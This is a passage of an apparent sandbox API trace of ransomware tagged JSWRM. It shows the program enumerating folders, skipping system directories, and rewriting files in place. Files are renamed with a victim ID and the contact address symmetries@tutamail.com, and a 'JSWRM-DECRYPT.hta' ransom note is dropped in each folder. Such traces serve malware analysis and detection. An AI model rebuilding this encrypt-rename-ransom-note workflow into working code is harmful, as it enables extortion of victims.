(lpFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.973] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=3859) returned 1 [0059.973] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf10) returned 0x23dc88 [0059.973] ReadFile (in: hFile=0x3d4, lpBuffer=0x23dc88, nNumberOfBytesToRead=0xf10, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesRead=0x345f2d4*=0xf10, lpOverlapped=0x0) returned 1 [0059.975] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.975] WriteFile (in: hFile=0x3d4, lpBuffer=0x23dc88*, nNumberOfBytesToWrite=0xf10, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x23dc88*, lpNumberOfBytesWritten=0x345f2d0*=0xf10, lpOverlapped=0x0) returned 1 [0059.975] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dc88 | out: hHeap=0x1e0000) returned 1 [0059.975] CloseHandle (hObject=0x3d4) returned 1 [0059.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0059.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0059.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0059.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0059.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0059.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0059.976] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0059.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0059.976] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.976] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1055\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1055\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0059.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0059.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0059.977] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a669345, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1a669345, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1a68f4f3, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0059.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0059.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0059.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0059.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0059.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0059.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0059.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0059.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0059.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0059.977] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0059.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0059.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0059.977] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.977] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c18 [0059.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0059.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0059.977] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0059.977] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.977] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0059.977] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0059.978] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0059.978] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0059.978] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0059.978] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0059.978] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0059.978] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0059.978] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0059.978] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0059.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0059.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0059.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0059.978] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0059.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.978] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.978] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0059.978] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.978] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=76818) returned 1 [0059.979] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.979] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x12c10) returned 0x2471a8 [0059.979] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x12c10, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0x12c10, lpOverlapped=0x0) returned 1 [0060.025] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.025] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x12c10, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0x12c10, lpOverlapped=0x0) returned 1 [0060.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.026] CloseHandle (hObject=0x3d4) returned 1 [0060.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0060.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0060.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0060.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x23a120 [0060.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217b40 [0060.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a120 | out: hHeap=0x1e0000) returned 1 [0060.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0060.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217b40 | out: hHeap=0x1e0000) returned 1 [0060.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.029] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml"), lpNewFileName="C:\\588bce7c90097ed212\\1055\\LocalizedData.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1055\\localizeddata.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0060.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0060.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0060.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0060.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0060.029] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.029] lstrcmpiW (lpString1="SetupResources.dll", lpString2=".") returned 1 [0060.029] lstrcmpiW (lpString1="SetupResources.dll", lpString2="..") returned 1 [0060.029] lstrcmpiW (lpString1="SetupResources.dll", lpString2="...") returned 1 [0060.029] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0060.030] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0060.030] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0060.030] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0060.030] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0060.030] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0060.030] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0060.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0060.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0060.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x2411c8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0060.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0060.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0060.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x2410d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0060.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232b48 [0060.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0060.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0060.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0060.030] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0060.030] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0060.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232b48 | out: hHeap=0x1e0000) returned 1 [0060.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0060.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0060.031] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="2052", cAlternateFileName="")) returned 1 [0060.031] lstrcmpiW (lpString1="2052", lpString2=".") returned 1 [0060.031] lstrcmpiW (lpString1="2052", lpString2="..") returned 1 [0060.031] lstrcmpiW (lpString1="2052", lpString2="...") returned 1 [0060.031] lstrcmpiW (lpString1="2052", lpString2="windows") returned -1 [0060.031] lstrcmpiW (lpString1="2052", lpString2="recovery") returned -1 [0060.031] lstrcmpiW (lpString1="2052", lpString2="perflogs") returned -1 [0060.031] lstrcmpiW (lpString1="2052", lpString2="documents and settings") returned -1 [0060.031] lstrcmpiW (lpString1="2052", lpString2="$RECYCLE.BIN") returned 1 [0060.031] lstrcmpiW (lpString1="2052", lpString2="system volume information") returned -1 [0060.031] lstrcmpiW (lpString1="2052", lpString2="msocache") returned -1 [0060.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0060.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0060.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0060.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0060.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225ab0 [0060.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0060.031] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\2052\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\2052\\jswrm-decrypt.hta")) returned 0xffffffff [0060.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225ab0 | out: hHeap=0x1e0000) returned 1 [0060.031] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0060.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0060.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0060.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0060.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0060.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0060.106] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2265b0 [0060.106] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0060.106] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\2052\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\2052\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0060.109] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.109] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0060.110] CloseHandle (hObject=0x450) returned 1 [0060.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2265b0 | out: hHeap=0x1e0000) returned 1 [0060.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0060.110] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0060.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0060.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0060.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0060.110] 